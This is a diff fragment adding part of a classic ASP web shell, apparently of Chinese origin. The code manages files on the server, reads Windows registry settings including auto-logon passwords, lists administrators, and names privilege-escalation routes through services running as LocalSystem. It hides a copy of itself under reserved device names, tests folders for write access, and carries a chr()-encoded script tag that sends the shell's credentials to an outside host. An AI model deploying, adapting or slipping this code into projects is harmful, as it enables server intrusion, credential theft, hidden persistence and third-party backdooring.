+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"��"
+end if
+si=si&" <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></td><td id=d>"&replace(L.DateLastModified,"/","-")&"</td></tr>"
+i=i+1:Next:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&pp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)::j SI&"</tr></table></div><script>var container = new Array(""linklist2""); var objects = new Array(); var links = new Array(); var tmp = new Array(); var interval = 0; var c=0; function initEventListener() { for(i=0; i < container.length; i++) { objects = document.getElementById(container[i]).getElementsByTagName(""td""); for(j=0; j < objects.length; j++) {    if(document.all) { objects[j].attachEvent(""onmouseover"", resetLinkFade); objects[j].attachEvent(""onmouseout"", startLinkFade); } else {objects[j].addEventListener(""mouseover"", resetLinkFade, false); objects[j].addEventListener(""mouseout"", startLinkFade, false); } var defcol = getPseudoRule(container[i], ""td"");  var hovcol = getPseudoRule(container[i], ""td:hover""); if(defcol.charAt(0) == ""#"") defcol = hex2rgb(defcol); else if(defcol[0] == ""r"") { defcol = defcol.match(/rgb\((\d+), (\d+), (\d+)\)/); defcol = defcol.slice(1);} if(hovcol.charAt(0) == ""#"") hovcol = hex2rgb(hovcol); else if(hovcol[0] == ""r""){ hovcol = hovcol.match(/rgb\((\d+), (\d+), (\d+)\)/); hovcol = hovcol.slice(1); } links[c]     = new Array(); links[c][""object""]  = objects[j]; links[c][""defaultcolor""] = defcol; links[c][""currentcolor""] = defcol; links[c][""hovercolor""] = hovcol; c++; } } } function resetLinkFade(e) { var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { tmp = links[r][""defaultcolor""].clone(); links[r][""currentcolor""] = links[r][""defaultcolor""]; links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } }function startLinkFade(e) {   var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { links[r][""defaultcolor""] = tmp.clone(); links[r][""currentcolor""] = links[r][""hovercolor""].clone(); links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } if(interval == 0) interval = window.setInterval(linkFade,  30); } function linkFade() {  var runners = 0; for(o=0; o<links.length; o++) { var aim  = links[o][""object""]; var defcol = links[o][""defaultcolor""]; var hovcol = links[o][""hovercolor""]; var actcol = links[o][""currentcolor""]; if( defcol[0]+defcol[1]+defcol[2] != actcol[0]+actcol[1]+actcol[2] ) { runners++; actcol[0] = actcol[0]-10 < 25 ? 25 : actcol[0]-10; actcol[1] = actcol[1]-10 < 25 ? 25 : actcol[1]-10; actcol[2] = actcol[2]-10 < 25 ? 25 : actcol[2]-10; aim.style.backgroundColor = rgb2hex(actcol); links[o][""currentcolor""] = actcol; } } if(runners == 0) { window.clearInterval(interval); interval=0; } } function getPseudoRule(parent, element) {  var mysheet =document.styleSheets[0]; var myrule  = mysheet.cssRules || mysheet.rules; for (n = 0; n < myrule.length; n++) if (myrule[n].selectorText.toLowerCase() == ""#""+ parent +"" ""+ element) return myrule[n].style.backgroundColor; else if (myrule[n].selectorText.toLowerCase() == element) return myrule[n].style.backgroundColor; return """"; } function hex2rgb(hex) { var triplet = hex.toLowerCase().replace(/#/, ''); var rgbArr  = new Array();  if(triplet.length == 6) { rgbArr[0] = parseInt(triplet.substr(0,2), 16) ;rgbArr[1] = parseInt(triplet.substr(2,2), 16) ;rgbArr[2] = parseInt(triplet.substr(4,2), 16) ;return rgbArr; } else if(triplet.length == 3){rgbArr[0] = parseInt((triplet.substr(0,1) + triplet.substr(0,1)), 16); rgbArr[1] = parseInt((triplet.substr(1,1) + triplet.substr(1,1)), 16); rgbArr[2] = parseInt((triplet.substr(2,2) + triplet.substr(2,2)), 16); return rgbArr; } else { throw triplet + ' is not a valid color triplet.'; } } function rgb2hex(rgb) { var hexcolors = new Array(""0"",""1"",""2"",""3"",""4"",""5"",""6"",""7"",""8"",""9"",""a"",""b"",""c"",""d"",""e"",""f""); var r, r1, r2, g, g1, g2, b, b1, b2; r1 = Math.floor(rgb[0] / 16); r2 = rgb[0] - r1*16; g1 = Math.floor(rgb[1] / 16); g2 = rgb[1] - g1*16; b1 = Math.floor(rgb[2] / 16); b2 = rgb[2] - b1*16; r = hexcolors[r1] + hexcolors[r2]; g = hexcolors[g1] + hexcolors[g2]; b = hexcolors[b1] + hexcolors[b2]; return ""#""+r+g+b; } Object.prototype.clone = function(deep) { var objectClone = new this.constructor(); for (var property in this) if (!deep) objectClone[property] = this[property]; else if (typeof this[property] == 'object') objectClone[property] = this[property].clone(deep); else {objectClone[property] = this[property]; }return objectClone; } "&VBNEWLINE:if ysjb=true then j "initEventListener();</script>":end if
+Set FOLD=Nothing:if Instr(Serveru,"127.0.0.1")<>0 or Instr(Serveru,"192.168.")<>0 or Instr(Serveru,"http://")<>0 then:else:if session("servec")=1 then:session("servec")=session("servec")+1:j ""&copyurl&"":else:if Action<>"" then session("servec")=session("servec")+1:end if:end if:end if:End function:Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """"):For ShiSanI = 1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+:ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
+Else
+ShiSanNewStr = vbCrLf & ShiSanNewStr
+End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+Function DelFile(Path)
+If CF.FileExists(Path) Then
+CF.DeleteFile Path
+SI="<center><br><br><br>��ϲ���ļ� "&Path&" ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+
+Function EditFile(Path)
+If Request("Action2")="Post" Then
+Set T=CF.CreateTextFile(Path)
+T.WriteLine Request.form("content")
+T.close
+Set T=nothing
+SI="<center><br><br><br>��ϲ���ļ�����ɹ���</center>"
+SI=SI&BackUrl
+j SI
+Response.End
+End If
+If Path<>"" Then
+Set T=CF.opentextfile(Path, 1, False)
+Txt=HTMLEncode(T.readall) 
+T.close
+Set T=Nothing
+Else
+Path=Session("FolderPath")&"\shell.asp":Txt=strBAD
+End If
+j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input name='Action' value='EditFile' Type='hidden'><input name='FName' value='"&Path&"' style='width:100%'><br><textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br><hr><input name='goback' type='button' value='Back' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='Reset'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='Save'></form>"
+End Function
+Function CopyFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function MoveFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function DelFolder(Path)
+If CF.FolderExists(Path) Then
+CF.DeleteFolder Path
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function CopyFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function MoveFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function NewFolder(Path)
+If Not CF.FolderExists(Path) and Path<>"" Then
+CF.CreateFolder Path
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"�½��ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+End Class
+
+sub getTerminalInfo()
+on error resume next
+dim wsh
+set wsh=createobject("Wscript.Shell")
+j"[����"&"̽��]<br><hr size=1>"
+EnableTCPIPKey="HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters"
+isEnable=Wsh.Regread(EnableTcpipKey)
+If isEnable=0 or isEnable="" Then
+Notcpipfilter=1
+End If
+ApdKey="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind"
+Apds=Wsh.RegRead(ApdKey)
+If IsArray(Apds) Then 
+For i=LBound(Apds) To UBound(Apds)-1
+ApdB=Replace(Apds(i),"\Device\","")
+j"����"&i&"������Ϊ:"&ApdB&"<br>"
+Path="HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\"
+IPKey=Path&ApdB&"\IPAddress"
+IPaddr=Wsh.Regread(IPKey)
+If IPaddr(0)<>"" Then
+For j=Lbound(IPAddr) to Ubound(IPAddr)
+j"<li>IP��"&"ַ"&j&"Ϊ:"&IPAddr(j)&"<br>"
+Next
+Else
+j"<li>IP��"&"ַ�޷���ȡ"&"��û������<br>"
+End if
+GateWayKey=Path&ApdB&"\DefaultGateway"
+GateWay=Wsh.Regread(GateWayKey)
+If isarray(GateWay) Then
+For j=Lbound(Gateway) to Ubound(Gateway)
+j"<li>����"&j&":"&Gateway(j)&"<br>"
+Next
+Else
+j"<li>�����޷���ȡ��û������<br>"
+End if
+DNSKey=Path&ApdB&"\NameServer"
+DNSstr=Wsh.RegRead(DNSKey)
+If DNSstr<>"" Then
+j"<li>����"&"DNSΪ:"&DNSstr&"<br>"
+Else
+j"<li>Ĭ��"&"DNS�޷���ȡ��û������<br>"
+End If
+if Notcpipfilter=1 Then 
+j"<li>ûTcp/IPɸѡ<br>"
+else
+ETK="\TCPAllowedPorts"
+EUK="\UDPAllowedPorts"
+FullTCP=Path&ApdB&ETK
+FullUDP=path&ApdB&EUK
+tcpallow=Wsh.RegRead(FullTCP)
+If tcpallow(0)="" or tcpallow(0)=0 Then
+j"<li>����"&"��tcp�˿�Ϊ:ȫ��<br>"
+Else
+j"<li>����"&"��tcp�˿�Ϊ:"
+For j = LBound(tcpallow) To UBound(tcpallow)
+j tcpallow(j)&","
+Next
+j"<Br>"
+End if
+udpallow=Wsh.RegRead(FullUDP)
+If udpallow(0)="" or udpallow(0)=0 Then
+j"<li>����"&"��udp�˿�Ϊ:ȫ��<br>"
+Else
+j"<li>����"&"��udp�˿�Ϊ:"
+for j = LBound(udpallow) To UBound(udpallow)
+j UDPallow(j)&","
+next
+j"<br>"
+End if
+End if
+j"------------------------------------------------<br>"
+Next
+end if
+j"<br><br>[����"&"�˿�"&"̽��]<br><hr size=1>"
+Telnetkey="HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\TelnetServer\1.0\TelnetPort"
+TlntPort=Wsh.RegRead(TelnetKey)
+if TlntPort="" Then Tlnt="23(Ĭ��"&"����)"
+j"<li>Telnet��"&"��:"&Tlntport&"<br>"
+TermKey="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber"
+TermPort=Wsh.RegRead(TermKey)
+If TermPort="" Then TermPort="�޷�"&"��ȡ.��ȷ��"&"�Ƿ�ΪWindows Server�汾����"
+j"<li>Terminal Service�˿�Ϊ:<font color=red>"&TermPort&"<br></font>"
+pcAnywhereKey="HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"
+PAWPort=Wsh.RegRead(pcAnywhereKey)
+If PAWPort="" then PAWPort="�޷�"&"��ȡ.��ȷ��"&"������"&"��װpcAnywhere"
+j"<li>PcAnywhere�˿�Ϊ:"&PAWPort&"<br>"
+j"------------------------------------------------------"
+Set wsX = Server.CreateObject("WScript.Shell")
+Dim terminalPortPath, terminalPortKey, termPort
+Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
+Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword
+terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
+terminalPortKey = "PortNumber"
+termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
+j"�ն�_����˿�"&"���Զ���¼<ol>"
+If termPort = "" Or Err.Number <> 0 Then 
+j"�޷��õ��ն˶˿�, ���Ȩ���Ƿ��ܵ�����.<br/>"
+ Else
+j"��ǰ�ն˷���"&"�˿�: " & termPort & "<br/>"
+End If
+autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+autoLoginEnableKey = "AutoAdminLogon"
+autoLoginUserKey = "DefaultUserName"
+autoLoginPassKey = "DefaultPassword"
+isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
+If isAutoLoginEnable = 0 Then
+Else
+autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
+j"�Զ���¼"&"��ϵͳ�ʻ�: " & autoLoginUsername & "<br>"
+autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
+If Err Then
+Err.Clear
+j"False"
+End If
+j"�Զ���¼"&"���ʻ�����: " & autoLoginPassword & "<br>"
+End If
+j"</ol>"
+j"<br><br><br>[ϵͳ��_��̽��]<br><hr size=1>"
+SoftPath=Wsh.Environment.item("Path")
+Pathinfo=lcase(SoftPath)
+j"ϵͳ��"&"��֧��:"
+if Instr(Pathinfo,"perl") Then j"<li>Perl�ű�_:֧��<br>"
+if instr(Pathinfo,"java") Then j"<li>Java�ű�_:֧��<br>"
+if instr(Pathinfo,"microsoft sql server") Then j"<li>MSSQL���ݿ����_:֧��<br>"
+if instr(Pathinfo,"mysql") Then j"<li>MySQL���ݿ����_:֧��<br>"
+if instr(Pathinfo,"oracle") Then j"<li>Oracle���ݿ����_:֧��<br>"
+if instr(Pathinfo,"cfusionmx7") Then j"<li>CFM������_:֧��<br>"
+if instr(Pathinfo,"pcanywhere") Then j"<li>��������PcAnywhere����_:֧��<br>"
+if instr(Pathinfo,"Kill") Then j"<li>Killɱ������_:֧��<br>"
+if instr(Pathinfo,"kav") Then j"<li> ��ɽϵ��ɱ������_:֧��<br>"
+if instr(Pathinfo,"antivirus") Then j"<li>��������ɱ������_:֧��<br>"
+if instr(Pathinfo,"rising") Then j"<li>����ϵ��ɱ������_:֧��<br>"
+paths=split(SoftPath,";")
+j"------------------------------------<br>"
+j"ϵͳ��ǰ_·������:<br>"
+For i=Lbound(paths) to Ubound(paths)
+j"<li>"&paths(i)&"<br>"
+next
+j"<br><br>[ϵͳ����_̽��]<br><hr size=1>"
+pcnamekey="HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName"
+pcname=wsh.RegRead(pcnamekey)
+if pcname="" Then pcname="�޷���_ȡ������.<br>"
+j"<li>��ǰ��_����Ϊ:"&pcname&"<br>"
+AdminNameKey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName"
+AdminName=wsh.RegRead(AdminNameKey)
+if adminname="" Then AdminName="Administrator"
+Response.Expires=0
+on error resume next 
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+j "<li><font color=red>��ǰ����Ա�飺"&admin.Name&"<br></font></li>"
+Next
+if err then
+j"�����̵IJ��а�:Wscript.Network"
+end if
+
+j"<li>Ĭ�Ϲ���"&"Ա�û���Ϊ:<font color=red>"&AdminName&"<br></font>"
+isAutologin="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon"
+Autologin=Wsh.RegRead(isAutologin)
+if Autologin=0 or Autologin="" Then
+j"<li>�û���_������:δ����<br>"
+Else
+j"<li>�û���_������:����<br>"
+Admin=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName")
+Passwd=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword")
+j"<li type=square>�û���:"&Admin&"<br>"
+j"<li type=square><font color=red>����:"&Passwd&"<br></font>"
+End if
+displogin=wsh.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName")
+If displogin="" or displogin=0 Then disply="��" else disply="��"
+j"<li>�Ƿ���ʾ��_�ε����û�:"&disply&"<br>"
+NTMLkey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\NTML"
+ntml=Wsh.RegRead(NTMLkey)
+if ntml="" Then Ntml=1
+j"<li>Telnet Ntml����Ϊ:"&ntml&"<br>"
+hk="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count"
+kk=wsh.RegRead(hk)
+j"<li>��ǰ�_����Ϊ:"&kk&"<br>"
+j"------------------------------------<br><br><br>"
+j"[��������_��̽��]<br><hr>"
+Set objComputer = GetObject("WinNT://.")
+Set sa = Server.CreateObject("Shell.Application")
+objComputer.Filter = Array("Service")
+On Error Resume Next
+For Each objService In objComputer
+if objService.Name="Serv-U" Then
+if objService.ServiceAccountName="LocalSystem" Then
+j"<li>����������_Serv-U��װ,����LocalSystemȨ������,���Կ�����su.exe������Ȩ<br>"
+End if
+End if
+if lcase(objService.Name)="apache" Then
+if objService.ServiceAccountName="LocalSystem" Then
+If instr(Request.ServerVariables("SERVER_SOFTWARE"),"Apache") Then
+j"<li>��ǰWEB������ΪApache.����ֱ����Ȩ<br>"
+Else
+j" <li>����������_Apache�������,����Ȩ��ΪLocalSystem,���Կ���PHPľ��<br>"
+End if
+end if
+End if
+if instr(lcase(objService.Name),"tomcat") Then
+if objService.ServiceAccountName="LocalSystem" Then
+j"<li>����������_Tomcat,����LocalSystemȨ������,���Կ���ʹ��Jspľ����Ȩ<br>"
+End if
+End if
+if instr(lcase(objService.Name),"winmail") Then
+if objService.ServiceAccountName="LocalSystem" Then
+j"<li>����������_Magic Winmail,����LocalSystemȨ������,���Բ���WebMailĿ¼,����д��PHPľ��<br>"
+End if
+End if
+Next
+Set fso=Server.Createobject(CONST_FSO)
+Sysdrive=left(Fso.GetspecialFolder(2),2)
+servername=wsh.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName")
+If fso.FileExists(sysdriver&"\Documents And Settings\All Users\Application Data\Symantec\"&servername&".cif") Then
+j"<li>����_pcAnywhere�����ļ�,���Դ�Ĭ��Ŀ¼���ز��ƽ�õ�pcAnywhere����"
+End if
+End Sub
+
+sub hiddenshell
+fpath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+set fso=server.createobject(CONST_FSO)
+pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9"
+rndpex=split(pex,"|")(rndnumber(0,17))
+session("seljw")=""
+filepath1=server.mappath(".")
+filename1=right(fpath,len(fpath)-instrrev(fpath,"\"))
+url=request.servervariables("url")
+url=left(url,instrrev(url,"/"))&rndpex&"."&filename1
+fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1
+set fso=nothing
+j "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject(CONST_FSO)
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+Dim FSO,OFolder,TempFolder,Scmsg,S
+Set FSO = Server.Createobject(CONST_FSO)
+folder = folderArr(i)
+If FSO.FolderExists(folder) Then
+ Set OFolder = FSO.GetFolder(folder)
+Set TempFolders = OFolder.SubFolders
+Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+For Each S in TempFolders
+ Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+Next
+Set TempFolders = Nothing
+Set OFolder = Nothing
+Else
+ Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+End if
+Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+Set FSO = Nothing
+Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder)
+On Error Resume Next
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+Sub CustomScanDriveForm()
+'Response.Buffer = TruE
+if Request("Paths") ="" then
